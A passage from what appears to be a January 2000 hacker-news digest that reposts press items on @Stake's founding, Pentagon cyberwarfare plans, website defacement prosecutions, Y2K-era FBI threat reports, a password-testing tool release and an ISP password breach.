Partners, and Compaq Computer."

The company will offer a full range of security services
enabling e-commerce for Global 2000 clients. @Stake will
focus on planning next-generation security platforms that
achieve long-term e-commerce objectives as well as
securing clients' immediate Internet needs. Key to the
company's strategic approach is building comprehensive
security architectures to minimize the impact of viruses,
malicious attacks and other threats while maximizing
opportunity and competitiveness for firms engaged in the
Internet economy. The company's professional services
span infrastructure security, including VPNs and firewalls;
content security,

such as anti-virus and e-mail scanning; application
security, including fine-grained application access control;
and operations security, such as intrusion detection and
scanning systems.

@Stake's management team includes:

* Dr. Daniel Geer, Chief Technology Officer, formerly vice
president and senior strategist at CertCo and director of
engineering at Open Market. His tenure as manager of
systems development at MIT's Project Athena led to the
creation of, amongst other innovations, the X Window
System and Kerberos.

* Ted Julian, VP of Marketing and Business Development,
formerly lead security analyst at Forrester Research and
known for the far-reaching impact of his reports, "Security
Suites: Dead on Arrival" and "Turning Security on Its
Head."

* Mudge, VP of Research and Development, served as
CEO/Chief Scientist of hacker think-tank, the L0pht.
Having appeared before the Committee on Governmental
Affairs of the US Senate to discuss vulnerabilities facing
technological resources, Mudge led the L0pht, a group of
'grey-hat hackers' known for unorthodox, extreme
technical sophistication.

* Dr. Phil Tams, VP of Consulting and Operations, formerly
a senior manager at Cambridge Technology Partners and
responsible for restructuring IT systems and businesses to
compete effectively in the Internet economy.

* John J. Rando, Chairman of the Board, was previously
senior vice president and group general manager at
Compaq. He is widely known for his work developing
software product services, pioneering new delivery
methodologies, and lifecycle service solutions in
networking and systems integration.

"@Stake helps clients address the most critical issue
facing their e-commerce initiatives: maintaining the
highest levels of security while maximizing openness," said
Ted Julian, Founder and VP of Marketing and Business
Development. "Our strategic approach is based on the
premise that true security lies in enabling the entire
enterprise, rather than locking down the system with
unnecessary complexity and control."

"By enabling Internet objectives, our security services
unleash enormous benefits for organizations building their
e-commerce operations," continued Julian.

According to IDC Research, the demand for network
security consulting and management services will reach
over $1.6 billion in 2002. In addition, in its November 29
brief, "exSourced Security Arrives," Forrester Research
"recommends the majority of businesses meet their
security needs with exSourcers ... third-party security
service providers that connect external constituents with
internal processes."

"The opportunity to join the first and only independent
'pure play' in the field of Internet security consulting is
perfect for the L0pht," according to Mudge, now @Stake's
VP of R&D. "@Stake's vendor neutrality, combined with
open lines of communication to the full spectrum of people
dealing with online security, allows us to remain true to
our roots - security research and execution which
shatters industry myths and builds a totally new
standard."

@Stake executives will be participating in the major
security trade show, RSA 2000, scheduled for January
16-20 in San Jose.

With headquarters in Cambridge, Mass, @Stake is a
specialized professional services firm providing security
solutions for the e-commerce operations of global clients.
More information can be found at www.atstake.com
@Stake, Inc. -- Securing the Internet Economy(sm).

-=-

@HWA

64.0 Offensive Cyberwar Capabilities Taking Shape 01/06/00
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by betty
Air Force Gen. Richard Myers told a Pentagon briefing
that he thinks cyberwarfare should take its place along
side bombs, cruise missiles and attack helicopters.
Myers currently commands Colorado based U.S. Space
Command, which is responsible for the cyber defense of
DoD systems. Later this year the computer network
attack research team will formally take shape at Space
Command Headquarters at Peterson Air Force Base.
(Space Command? Sounds like something out of a
sceince fiction novel.)

Reuters - via MSNBC
http://www.msnbc.com/news/353982.asp

Wired
http://www.wired.com/news/politics/0,1283,33443,00.html

General Richard B. Myers.

U.S. plots cyberwarfare strategy

Pentagon officials say they intend to target foes� computers

REUTERS

WASHINGTON, Jan. 5 � The Pentagon plans to make
cyber blitzes on a foe�s computer networks a
standard war tactic, the incoming number two U.S.
military officer said Wednesday.

AFTER POLICY and legal issues are sorted out, cyber
tactics should take their place in every commander�s arsenal
alongside bombs, cruise missiles and attack helicopters, Air
Force Gen. Richard Myers told a Pentagon briefing.
�I think it�s just going to be one more arrow in the
quiver,� said Myers, who takes over as vice chairman of the
Joint Chiefs of Staff on March 1.
The formal establishment of a cyberwar-fighting
doctrine will build on covert military and intelligence
capabilities that have been scattered in �black� programs in
the past.

�A VERY ELEGANT WAY�
Myers said such �keystroke� attacks would have the
advantage of limiting both U.S. casualties and spillover harm
to a target nation�s population.
�If you can degrade an air defense network of an
adversary through manipulating ones and zeros, that might be
a very elegant way to do it as opposed to dropping
2,000-pound bombs on radars,� he said.
�These are tools that need to go to the operational and
tactical levels.�
Currently, each of the U.S. armed services has a covert
cyber attack capability of its own, said Myers. �I think it�s
fair to say that we have done this in the past on a
case-by-case basis.�
He cited the conflict in Kosovo last year, after which
Gen. Henry Shelton, chairman of the Joint Chiefs, said the
United States had mounted electronic attacks into Serbian
networks during a NATO air campaign.
�We worked through some policy and legal issues during
Kosovo that will hopefully help us in the future,� Myers said.
But he said Serbia offered �limited opportunities� because the
Serbs were �not relying on systems that were heavily
involved with information technology.�
Myers said other countries considered cyber attack as a
way of neutralizing nations like the United States which had
overwhelming advantages in conventional forces.

TEAM TAKING SHAPE

The Colorado Springs, Colo.-based U.S. Space
Command, which is headed by Myers, assumed responsibility
on Oct. 1 for defending Defense Department computer
networks from hacker or foreign attack.
Next October 1, a companion �computer network
attack� research team will formally take shape at Peterson
Air Force Base, headquarters of the Space Command. Its
first job will be to piece together covertly developed U.S.
cyber weapons currently scattered among intelligence and
military units.
Among the thorny policy issues is the potential blurring
of the line between military and civilian targets. Myers cited
the case of knocking out a communications network handling
civilian applications as well as a nation�s air defense.
�I think it�s going to be the legal advisers and the war
fighters thinking our way through this,� he said. �And it�s just
something we haven�t spent an awful lot of time doing, and
we just need to do that.�
Critics have warned that the United States is opening a
Pandora�s box in moving to integrate �information warfare�
tools into military doctrine.
�Those same tools would likely be a bigger threat to our
systems than to those of any potential opponent,� said
Kawika Dagui of the Financial Information Protection
Center, a Washington-based industry trade group.

-=-

Wired;

A'Hacking the Military Will Go
by Declan McCullagh

12:30 p.m. 5.Jan.2000 PST
WASHINGTON -- In a move to enlist
hackers as part of the nation's defense,
the US military is drafting a plan to
penetrate and disrupt the computers of
enemy nations, officials said Wednesday.

"If you can degrade the air defense
network of an adversary through
manipulating 1s and 0s, that might be an
elegant way to do it," said General
Richard Myers of the US Space Command,
which is coordinating the effort.

Myers told reporters that Pentagon
planners are currently devising general
hacker-war procedures, which must be
approved by the Secretary of Defense
and should be complete by October.

In October 1999, the Space Command
took over the job of protecting Defense
Department computers from hacker
attacks.

But its new roles raise some knotty
questions. For instance, should the
military be involved in defending vital
military communications when they travel
over commercial networks? Should online
attacks on an enemy's infrastructure be
viewed as an act of war, and should such
attacks be approved by the president,
Congress, or the Pentagon?

Myers admitted the answers are still
unknown. "A very big part of what we do
is to work through the policy and legal
parts."

One option -- in a kind of unilateral
arms-control agreement -- is for the US
to pledge not to launch electronic
attacks in hopes that international law
will follow. It's seems to be what China --
which last year asked the UN General
Assembly to investigate the issue -- and
Russia both want.

But for now, the Pentagon is readying its
platoons of hackers.

"The services are trying to attract the
best and the brightest to come into this
area," Myers said. "We think we can do
that because we are going to be working
on leading-edge technology, we'll give
them the right tools, and they'll be doing
something for their country."

The Pentagon's announcement, which has
been quietly discussed for nearly a year,
comes at a time when military worries
about hackers are at an all-time high.
Officials had fretted that attacks would
increase on Y2K eve, though government
sources say only one minor incident took
place.

A September 1999 report prepared by
congressional auditors claimed there were
"serious weaknesses" in the Defense
Department's information security.

Military networks reportedly experienced
over 18,500 intrusions last year,
compared to 5,844 in 1998, though some
critics have questioned the methodology
used to determine those figures.

Back in 1997, a war-game exercise named
Eligible Receiver reportedly showed that
enemy hackers -- in this case, ones
playing the part from the National
Security Agency -- could bring down 911
phone service and power grids in some
cities.

The military's NIPRNET (Non-classified
Internet Protocol Router Network) carries
non-secret information, while the
SIPRNET (Secret Internet Protocol Router
Network) handles more sensitive data.

@HWA

65.0 Army Criticized By Judge On Lack of Security 01/06/00
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Ted
U.S. District Judge J.P. Stadtmueller has criticized the
U.S. Army's efforts to keep its public Web site secure.
The Judge said the Army's effort, or lack of it, could
effect the amount of restitution Mindphaser (Chad
Davis) is ordered to pay. Mindphaser has pleaded guilty
to defacing the server last June 28th. Stadtmueller
asked Assistant U.S. Attorney Eric Klumb to get more
information on the matter before Mindphaser's scheduled
sentencing hearing in March. (Wonder if he will mention
that the Army was warned about the problem with
their server weeks in advance?)

Associated Press - via San Jose Mercury News
http://www.sjmercury.com/svtech/news/breaking/ap/docs/58972l.htm

HNN Archive of US Army Defacement
http://www.hackernews.com/defaced/1999/army/index.html

Posted at 12:26 p.m. PST Wednesday, January 5, 2000

Judge critical of Army Web site

MILWAUKEE (AP) -- A federal judge criticized the U.S. Army's efforts to
keep its public World Wide Web site secure after a 20-year-old man said it
was easy to hack into it.

``The Army didn't do its homework in the first instance,'' U.S. District
Judge J.P. Stadtmueller said Tuesday.

The judge commented as Chad D. Davis said pleaded guilty Tuesday to
gaining unauthorized access to the site and altering its contents.

Davis said he had hacked into the Army computer using information freely
available on the Internet. He replaced the Army's opening Web page with
the ``signature page'' of Global Hell, a nationwide group of hackers to
which he belonged.

Stadtmueller said the Army's effort, or lack of it, to keep its Web site
secure could affect the amount of restitution Davis is ordered to pay. The
judge directed Assistant U.S. Attorney Eric Klumb to get more information
on the matter by the time Davis is sentenced in March.

Davis exploited a security flaw in a computer program used in building the
Web site, according to federal court documents in the case.

Klumb said the Army had installed a ``patch'' for the shortcoming before
Davis broke in. But there was a period during the summer when the Web site
was being moved from one server to another when the patch was not
installed on the new server, Klumb said, allowing Davis to break in.

Pentagon spokeswoman Nancy Ray said Wednesday that hacking is electronic
vandalism.

``It's against the law. That's why the person was in court,'' Ray said.

@HWA

66.0 FAA Responds to Allegations 01/06/00
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Evil Wench
The Federal Aviation Administration has said that even
though they hired foreign nationals to fix their Y2K
computer problems that their systems where not
compromised as charged by the General Accounting
Office. The GAO report released Jan. 4 said that the
FAA had not consistently required appropriate
background checks on contractor employees who
reviewed and fixed air traffic control software for Y2K
compliance. The FAA says that although foreign
nationals may have been used no back doors where
inserted into the code.

Federal Computer Week
http://www.fcw.com:80/pubs/fcw/2000/0103/web-faa-01-05-00.html
(Sorry, page returned a 404 - Ed)

@HWA

67.0 Electronic Intruder released with Fine and No Jail 01/06/00
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by no0ne
Peng Yuan Han, now 18, will not be spending any time in
jail for electronically breaking into the computer systems
of Singapore's National Computer Board (NCB), Ministry
of Education (MOE) and Nanyang Technological
University (NTU). Instead he was fined SG$8,000
because he was a teenager when the crimes were
committed in 1997.

The Straits Times
http://straitstimes.asia1.com/cyb/cyb3_0106.html
(Sorry, page also returned a 404 - Ed)

@HWA

68.0 PalmCrack 1.0 Released 01/06/00
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by kingpin
NonCon, Inc., has release PalmCrack 1.0 which is
capable of checking UNIX and NT passwords against a
dictionary and decrypt certain Cisco router passwords.
The release of this software was delayed until after Jan
1, 2000 in accordance with President Clinton's request

Noncon
http://www.noncon.org/

Press release:

Noncon Releases PalmCrack�, the Password Testing Tool for the Palm
Computing Platform�

Internet - January 5, 2000 - Noncon has released PalmCrack, the password
testing tool for the Palm Computing Platform. Designed to help security
professionals determine the strength of passwords, PalmCrack is able to check
UNIX and NT passwords against a dictionary and decrypt certain Cisco router
passwords.

PalmCrack runs on PalmOS 2 and PalmOS 3 devices, including the PalmPilot
Professional through the PalmVII and the IBM WorkPad series. It requires
31KB to 1MB of memory depending on the size of the dictionary installed.

About Noncon
Noncon is a group of rebel non conformists formed in 1982. Their goal is to
provide non conforming solutions to the public. For more information, check out
the Noncon web site at http://www.noncon.org/. Note: In accordance with
President Clinton's request, the release of this tool was delayed until after January
1, 2000.

@HWA

69.0 Radio Pirates (criminals) Steal Police Airwaves 01/06/00
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

HWA Comment:

These aren't pirates, they are just kids with some radios and no skill being
vandals and disrupting emergency services, the type you find buying 2m ht's
and spewing QRM over legit ham airwaves, they should be hunted down with RDF
gear and have the book thrown at them, there is nothing skillful or 'elite'
in disrupting legit radio services! anyone with minimal knowledge can purchase
and modify standard 2meter band ham radios to broadcast over emerg. freqs.and
some radios have such extended coverage built in, these are just vandals akin
to the lewsers that tie up 911 services with bogus calls for kicks, the killer
in all this is that these people will most likely be caught as the technology
for tracking such abuse is quite sophisticated similar to cell tracking.
- Ed (licensed ham operator)

From HNN http://www.hackernews.com/

contributed by mphantasm
Police departments in San Francisco, Berkeley,
Richmond, and Albany have reported intruders on their
communications systems. Screaming obscenities and
making false emergency calls over reserved police radio
frequencies are just some of the issues involved.

APB News
http://www.apbnews.com/cjprofessionals/behindthebadge/2000/01/05/copradio0105_01.html

Radio Pirate Invades Police
Frequencies
Broadcasts False Reports in San Francisco Area

Jan. 5, 2000

By Robert Wang

BERKELEY, Calif. (APBnews.com) -- Several
police departments in the San Francisco Bay
area are searching for a radio-frequency pirate
who has invaded the police radio bands,
transmitting bogus crime reports and
profanity-laced tirades.

Another man was arrested in the Los Angeles
area last week for a similar offense.

Spokesman Tony Parrino said the California
Highway Patrol's communications center in
Vallejo received eight to 10 transmissions in December on its frequencies
from a man posing as a police officer and claiming there was a shooting in
progress or a shot officer.

"He's quite disruptive, and he has caused our officers and other agency
officers to roll Code 3 with red lights and sirens to different locations --
which have turned out not to be true -- at great risk to the public and to our
officers and all public-safety officers en route to that location," Parrino said.
"He's quite a problem right now."

Police departments alerted

Police in San Francisco, Berkeley,
Richmond, and Albany have reported similar
incidents, and all their officers have been
alerted about the prankster.

The Federal Communications Commission
(FCC), which regulates the nation's radio
airwaves, said it is investigating but refused
to state the status of its probe.

In an apparent coincidence, the California
Highway Patrol (CHP) in the Los Angeles area said its investigators
arrested Jack Gerritsen, 63, of Bell last week for broadcasting recorded
profane comments on frequencies used by the CHP and other police
agencies in the Los Angeles area as well as a TV station's news unit.

The CHP said it knows of no link between the two cases. They have not
yet found the man in the Bay area. He appears to be equipped with a
programmable radio transceiver and is well-versed in police radio codes.

May be disgruntled ex-employee

Parrino said the man apparently monitors police transmissions and may be
a former government employee.

He said CHP dispatchers have often warned him over the air to stop his
activities.

"This usually sets him off where he starts a list of profanities and starts
yelling over the radio," Parrino said. "He starts saying, 'How much time am
I going to get in jail? What are they going to do to me?'"

The CHP said it is no longer dispatching units in response to the man's
calls.

Berkeley police said they have had six to eight on-air encounters with the
man since early December.

Obscenities aimed at dispatchers

Berkeley police Lt. Russell Lopes said that on Dec. 28 the radio pirate
reported a shooting at a street intersection that does not exist. The
dispatcher, realizing it was a hoax, read a lengthy FCC warning telling him
to desist.

The man replied by yelling over the dispatcher's voice, Lopes said,
swearing at the dispatcher and launching into an expletive-filled tirade.

The dispatcher then switched police radio traffic to another channel, and
the man disappeared.

Lopes said they now recognize his voice and no longer send units to
respond to his calls.

Goes away if ignored

"It seems like if he gets on the radio and makes a call and we just ignore
him, he kind of goes away," said Lopes, who is not committing much
manpower to investigating the case. "We're really not too concerned about
it. We're trying to figure out who it is, but it's not a major deal. ... [If] he
gets on the radio and he stays on the radio for any length of time, we can
go to another channel which he cannot get onto. It's [only] an
inconvenience."

Lopes said they last heard from the man Sunday night, but he did not have
details.

The San Francisco police reported that on Thursday, a person transmitted
twice within 15 minutes on one of their police frequencies that an officer
was in trouble. The dispatch center promptly performed a roll-call check of
all officers on duty and found that the call was false, said Rex Martin, the
department's director of 911 communications.

Martin said the department is not investigating because it was an isolated
incident.

A threat to public safety

In Albany, the police force said the mysterious prankster has aired two
bogus incidents on its frequency. Because the dispatcher knows the
voices of all 30 officers in the department, the fake calls were recognized
immediately, but officers dispatched just in case.

Detective James Horn said the man's actions could threaten public safety
by interfering with the transmissions of emergency personnel.

"If there was an ongoing emergency, he could severely hamper rescue
efforts," Horn said. "I hope he's caught. Again, getting on law enforcement
channels is dangerous."

Police say they have no clue as to the man's motive.

'We should stop this guy'

"Maybe he's got something against law enforcement. Maybe he just gets
his jollies off doing it," said Horn.

Parrino said, "This is wrong, and we should stop this guy, but there's not
much that we can do. ... [The] investigators, they have a terrible job trying
to find where this guy is."

Lopes said he would be difficult to catch.

"He could be anywhere in the Bay area," he said. "He could be stationary
inside a home. He could be in a car. There's just no way of telling."

FCC lends a hand

In Southern California, Gerritsen was arrested after the highway patrol
enlisted the FCC's help.

CHP Sgt. Jeffrey D. Goodwin said Gerritsen recorded obscene comments
with a digital recorder that distorted his voice and used a hand-held
programmable radio to transmit them over 100 times in a period of three
months.

Goodwin said CHP investigators during surveillance operations would hear
comments like "The CHP are a bunch of [expletive]" on their radios several
times during a particular day.

"It's annoying. Secondly, it interferes with our operations, and that also
bothered me, so that's why our unit investigated this," Goodwin said.

Faces only misdemeanor charges

Because the transmissions could interfere with a radio distress call by a
CHP officer, the agency arranged for the FCC to track the signals with
sophisticated equipment and triangulation.

Once the FCC pinpointed his location, CHP said its investigators caught
Gerritsen in the act of transmitting outside of his coin exchange store in
Bell.

Because the alleged violations were only misdemeanors, Gerritsen was
immediately released and given an order to appear in court this month. He
faces a year in jail for each offense. Goodwin said the transmissions have
stopped.

Gerritsen could not be reached for comment.

"Somebody like this should be arrested and put in jail because it affects or
could possibly affect the safety of the officers," said Goodwin. "The
potential for something serious happening has been averted by his arrest."

Robert Wang is an APBnews.com staff writer (robert.wang@apbnews.com).

@HWA

70.0 ParseTV has Abruptly Canceled 01/07/00
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by ewidgb
The online television network Pseudo has cancelled its
Hack/Phreak streaming TV channel. ParseTV has been
closed, effective immediately. We have not received an
official reason for the abrupt cancellation. ParseTV
made headlines last year when the show's host
attempted to perform a hoax on the MTV documentary
'Real Life'. Shamrock, the show's host, was replaced
shortly thereafter for unrelated reasons. Reruns will still
be available on the site until further notice.

ParseTV
http://www.parsetv.com

Letters from HNN Viewers Regarding the MTV special
http://www.hackernews.com/special/1999/mtv/mtv.html

Letter from Emmanuel Goldstein regarding the MTV special
http://www.hackernews.com/special/1999/mtv/emmanuel.html

Letter from Shamrock regarding the MTV special
http://www.hackernews.com/special/1999/mtv/shamrock.html

@HWA

71.0 Finland Authorities Solve Massive Computer Crime Case 01/07/00
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by avarr
The Finnish police have solved what is thought to be
Finland's largest electronic intrusion ever. A young man
with the alias TCB had electronically broken into over a
hundred computer systems owned by the state,
businesses, high schools and others in Finland and
abroad during 1997 and 1998. It appears that no
damage was caused but the attacker did collect users'
log-ins, passwords and emails. The intruder was able to
acheive root access in 60% of the systems he broke
into . The Finnish Central Criminal Police (KRP) calls this
a good lesson in computer security for businesses and
communities.

Kotimaa - in Finnish only
http://ww2.yle.fi/show/YleEsitData?sivu_id=53973&usr_id=0
(Anyone want to translate this?? - Ed)

@HWA

72.0 The EPA Cracks Down On Security 01/07/00
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Diane
After an audit last month by the General Accounting
Office the Environmental Protection Agency has taken
several steps to beef up the security of its systems.
The EPA has taken such steps as early termination of
remote access, installing the latest patches, and
reconfiguring the server to help shore up its systems.

Federal Computer Week
http://www.fcw.com/pubs/fcw/2000/0103/web-epa-01-06-00.html
(Sorry, page requested returned a 404 - Ed)

@HWA

73.0 FBI Still Investigating Y2K Cyber Threats 01/07/00
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Evil Wench
The deputy assistant director of the FBI, Michael Vatis,
told reporters that the agency has thwarted up to six
Y2K related cyber intrusions and detected sophisticated
automated tools aimed at knocking out computer
networks.

Reuters - via ZD Net
http://www.zdnet.com/zdnn/stories/news/0,4586,2418190,00.html?chkpt=zdnntop

FBI investigating 20 Y2K threats

Several incidents involved threats to blow up
equipment such as power plants, while others
involved cyber intrusions or detection of
sophisticated hacker tools.

By Reuters
January 6, 2000 2:14 PM PT

The FBI said Thursday it had moved to thwart up to
20 or so possible threats against targets such as
power plants and computer networks during a
heightened security watch that started before 2000
dawned.

About a dozen "physical incidents"
involved threats to blow up equipment
such as electrical power plants, while
another six or so involved cyber
intrusions or detection of sophisticated
''hacker'' tools aimed at knocking out
computer networks, deputy assistant
director Michael Vatis told reporters.

"On neither side did we think that this level of activity was
particularly unusual," added Vatis, who oversaw a 24-hour
headquarters command post tied to special year-end
watches at all 56 FBI field offices.

Asked to explain what he meant by the type of "physical"
violence in question, Vatis said: "threats involving
explosives or physical destruction of equipment or a plant
of electrical power or something like that."

Cases still under investigation
All of the cases opened during the special year 2000
watch were still being investigated, an FBI spokeswoman,
Debbie Wireman, said.

The FBI published on Nov. 2 a
study called Project Megiddo,
which warned of possible year
2000-related violence by cults
seeking to spark a biblical day of
reckoning or by other domestic
fringe groups.

The study had warned that a
The study had warned that any power outages or
breakdowns sparked by the so-called Y2K computer
quirk could play into conspiracists' fears of a plot to
create a "one-world government."

The project was dubbed Megiddo after a hill in northern
Israel linked to Armageddon, the prophesied final battle
between forces of good and evil.

Attorney General Janet Reno did not answer directly
when asked why she thought the fears reflected in the
Megiddo report had not yet led to any big trouble.

"The nice answer would be that there was no threat," she
told her weekly press conference. "What we must all do, I
think, is ... take reasonable precautions ... when we have
specific information that can inform the American people,
that we advise them."

The FBI Y2K command post operated from Dec. 29 to
Jan. 5. Vatis declined to comment on whether any
suspected plots to strike New Year's Eve celebrated had
been foiled or whether any originated abroad. He declined
to discuss specifics of the physical threats under
investigation or link any of them to any year 2000 issues.

Bomb-making threat discussed
He also declined to address the case of an alleged plot to
smuggle bomb-making material into the United States
from Canada. One Algerian man, Ahmed Ressam, has
been charged while the authorities are investigating a
suspected associate, Abdel Hakim Tizegha, held in
Seattle on immigration charges.

Vatis is director of the National Infrastructure Protection
Center, or NIPC, an interagency group designed to detect
and deter both cyber intrusions and physical attacks on
infrastructure such as power grids, pipelines and water
systems.

On the computer security side, Vatis urged system
administrators to download a new NIPC tool to scan for a
hacker tool designed to cripple networks.

The download was made available on the NIPC Web page
on Dec. 30, after discovery of new so-called "distributed
denial of service" tools aimed at systems using the Sun
Solaris operating system.

Vatis said three of the half dozen or so new FBI
investigations were triggered in recent days when private
companies, using the NIPC detection software, found
signs their networks had been penetrated.

The hacker devices -- such as one dubbed "trin00" and
another called "Tribe Flood Network" or "tfn" -- are
capable of enlisting multiple systems to amplify an attack
on the ultimate target, Vatis said.

@HWA

74.0 Clinton Wants Increased Computer Security 01/07/00
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by mortel
President Clinton plans to announce a new initiative
Friday to protect federal computers from infiltrators.
Administration officials speaking on the condition of
anonymity said Clinton's budget request for 2001 would
seek additional funds for monitoring and protecting
government computer systems.

Associated Press - via Yahoo
http://dailynews.yahoo.com/h/ap/20000107/pl/clinton_cyber_terrorism_2.html

Friday January 7 12:03 AM ET

Clinton Aims To Combat Hackers

WASHINGTON (AP) - Stepping up vigilance against cyber-terrorism, President
Clinton plans to announce a new initiative Friday to protect federal
computers from infiltrators.

Clinton has frequently expressed concern about the emerging threat that
hackers, thieves and other governments pose to the nation's high-tech
infrastructure. A top adviser Thursday included cyber-terrorism near the
top of a list of threats facing America in the next century.

``I think there's a whole new realm of threat we're going to be dealing
with,'' National Security Adviser Sandy Berger said in response to a
questions after a National Press Club speech. ``The ability to take
weapons of mass destruction across national borders with relative
ease; the ability to attack our computers that run our infrastructure
through cyber-terrorism.''

Administration officials speaking on condition of anonymity said Clinton's
budget request for 2001 would seek additional funds for monitoring and
protecting government computer systems.

``Now that we're past Y2K, we need to continue to insulate and secure our
nation's computers,'' one official said.

The official did not have any specific dollar figures, but USA Today
reported in Friday's issue that the plan includes $2 billion to make the
government's computer systems less vulnerable to attack.

The new initiative builds on steps the administration announced last year.
It would seek to develop new technologies, increase public and private
cooperation against computer sabotage, improve training for government
agents and boost protection of computer systems.

``It's creating a number of programs to train, detect and strengthen our
ability to deal with cyber-terrorists,'' the official said.

Last July, the administration announced that it was creating a
government-wide security network to protect against hackers. The plan
included an elaborate network of electronic obstacles, monitors and
analyzers to watch for suspicious activity.

The first 500 intrusion monitors were to be installed on non-military
government computers early this year, and the full system was to be
computed by May 2003.

@HWA

75.0 Interview with Lloyd's of London and RailTrack Defacer 01/07/00
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by evilwench
Over the New Year, Lloyd's of London and a number of
other sites including Railtrack UK, Eidos, and the
Electronic Frontier Foundation (EFF) had their web
pages defaced. MisterX who has claimed responsibility
for these actions has given an interview with the UK
Register.

The UK Register
http://www.theregister.co.uk/000106-000001.html

Posted 06/01/2000 2:03pm by Mike Magee

Railtrack, Lloyds of London Web hacker explains
motives

A member of a group which hacked into the Lloyds of London web site twice in one
day has explained his intent in an exclusive interview with The Register.

Over the New Year, Lloyds and a number of other sites including Railtrack UK, Eidos,
and the Electronic Frontier Foundation (EFF) suffered attacks to their sites from
groups appearing to act in concert.

The hacker, who calls himself MisterX, also claims, in the interview below, that credit
card transactions across the Internet are unsafe, and that he and his group have
methods for hoovering up confidential data from Web sites.

Q Hackers are generally described in the press as malicious or mischievous. Is there
any serious intent to this activity, is it an intellectual exercise or is it just done for "fun"
or to see if it can be done?

ASome people do it for intellectual challenge, others do it with malicious intent. Some
do it for fame amongst the hacker community, but all they get is disrespect. My hacks
were to prove a point, which I think they have done. Many large UK organisations need
to revise their security strategies, or lack of them. I defaced web sites to prove this
point, but I could have easily got access to other systems and caused alot of damage.
I am trying to make the community, in general, aware of the threats of cyber terrorism,
and how real they are.

Q What are the lessons large businesses should learn from their apparent inability to
protect themselves against hacking?

A They could have protected themselves from the attacks I used on them if only they
had kept up to date on the latest computer security developments.

Q Is there a worldwide network of people who share ideas and collectively hack sites,
or is it more like small groups who have little contact with each other?

A There is an underground scene, which shares files unreleased to the public. [These
are] files on the latest security developments hot off the press, way before the public
even knows these holes exist. But good morals normally lead them into the open. As
for web site defacement it is generally small groups that do this, trying to compete
against each other, and these groups are not very well respected within the
mainstream community.

Q Are the legal penalties against hacking that many governments have instituted any
deterrent at all? Are the legal penalties too heavy handed?

A Some governments have ridiculous penalties, as in the case of two Chinese
hackers who stole a measly amount from a bank and were sentenced to death. The
UK is more lax on the law in this respect :)

I would just like to delve slightly into e-commerce. I warn the public about the drastic
dangers of shopping online.

I, personally, could break into a number of highly used e-commerce sites and steal the
credit card numbers of every customer that ever shopped there.

The head of Novell that shopped online and had his credit card number snarfed, said
it was due to cookies. Well, the truth is someone most probably broke into one of the
sites he used it on and his wasn't the only card abused, yet the site probably would not
have even know the attack had taken place, and could still be taking place.

Shopping online is not safe at the moment, despite what the big companies say, and
which are just trying endlessly to grab your money, and see as the Internet as just
another means of doing so.

They tell you that they care about your security, OK, I grant them that, maybe they do. It
is not in their hands though. As I mentioned earlier, hackers have resources
unavailable to the general public, meaning a system administrator may think his site is
secure, but, some one some where has a method of breaking in. �

Lloyds of London, Met Office follow Railtrack UK in hack attack

@HWA

76.0 Pac Bell Hit by Possible Cyber Intruder 01/10/00
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by The_Question
Law enforcement officials recently notified PacBell that
persons currently in custody had gained access to the
passwords of some of the ISPs California users. PacBell
has gone so far as to force users to change their
passwords. PacBell has said that users who do not
change passwords by January 14 will be locked out of
their account. It is unknown how many accounts are
actually effected or who the persons in custody are.
Pacbell did say that no unusual account activity has
been noticed. (It is a little late to change passwords
now, especially if you have no idea how the list was
compromised in the first place.)

ZD Net
http://www.zdnet.com/zdnn/stories/news/0,4586,2419466,00.html?chkpt=zdnntop

Teen hacks 27 ISPs, gains root access

Pacific Bell Internet Services not the only ISP
to have its network compromised by a teen
hacking ring.

By Robert Lemos and Sean Silverthorne, ZDNet News
UPDATED January 10, 2000 6:13 PM PT

A 16-year-old hacker affiliated with the cybergang
known as Global Hell compromised at least 27
Internet service providers late last year, stealing
passwords and, in some cases, destroying data,
according to details of a police investigation
released Monday.

The organizations that were compromised were "mainly in
the U.S.," said Damian Frisby, a detective with the
Sacramento Valley Hi-Tech Crime Task Force. "A lot of
them were private Internet companies, law schools and
colleges, and a couple were backbone Internet providers.
The hackers were able to gain root access."

The facts in the case came three days after Pacific Bell
Internet Services notified an unknown number of
customers that their passwords had been compromised
and that they have until Jan. 14 to change them. In an
e-mail message sent Friday to customers, Valeri Marks,
president and CEO of Pacific Bell Internet Services, said
that a band of hackers targeted a number of its California
customers.

"We were recently notified by law enforcement officials
that a ring of hackers, currently in police custody, had
gained access to the password information of some
California ISP users. Although there has been no
indication of any account abuse, you should change your
password immediately," the notice read.

One teen charged
In fact, the police have charged just one person, a
16-year-old West Hills, Calif., resident, with several
felonies including unlawful access and grand theft.
According to Frisby, the cyberthief had connections with
a notorious online group known as Global Hell, several
members of which were arrested last fall by federal law
enforcement officials.

The original investigation
followed a Dec. 7, 1999,
complaint by Innercite,
an El Dorado County
Internet service provider,
which reported that its servers had been compromised
